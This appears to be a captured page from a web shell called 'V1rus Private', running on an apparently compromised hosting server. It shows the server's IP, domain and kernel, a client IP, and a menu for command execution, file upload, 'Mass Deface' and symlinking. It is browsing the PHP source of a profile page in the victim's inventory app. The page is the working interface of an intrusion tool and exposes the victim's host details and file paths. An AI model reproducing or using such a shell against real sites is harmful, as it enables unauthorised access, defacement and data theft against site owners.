V1rus Private
User / IP
:
216.73.217.108
Host / Server
:
190.92.174.125 / aerosofthealthcare.com
System
:
Linux s3739.bom1.stableserver.net 4.18.0-513.24.1.lve.2.el8.x86_64 #1 SMP Fri May 24 12:42:50 UTC 2024 x86_64
Cmd
|
Upload
|
Mass Deface
|
Create
|
Sym
:
/
home
/
aerosoft
/
public_html
/
InventorySystem
/
Viewing: profile.php
<?php $page_title = 'My profile'; require_once('includes/load.php'); // Checkin What level user has permission to view this page page_require_level(3); ?> <?php $user_id = (int)$_GET['id']; if(empty($user_id)): redirect('home.php',false); else: $user_p = find_by_id('users',$user_id); endif; ?> <?php include_once('layouts/header.php'); ?> <div class="row"> <div class="col-md-4"> <div class="panel profile"> <div class="jumbotron text-center bg-red"> <img class="img-circle img-size-2" src="uploads/users/<?php echo $user_p['image'];?>" alt=""> <h3><?php echo first_character($user_p['name']); ?></h3> </div> <?php if( $user_p['id'] === $user['id']):?> <ul class="nav nav-pills nav-stacked"> <li><a href="edit_account.php"> <i class="glyphicon glyphicon-edit"></i> Edit profile</a></li> </ul> <?php endif;?> </div> </div> </div> <?php include_once('layouts/footer.php'); ?>
Coded With 💗 by
HanzOFC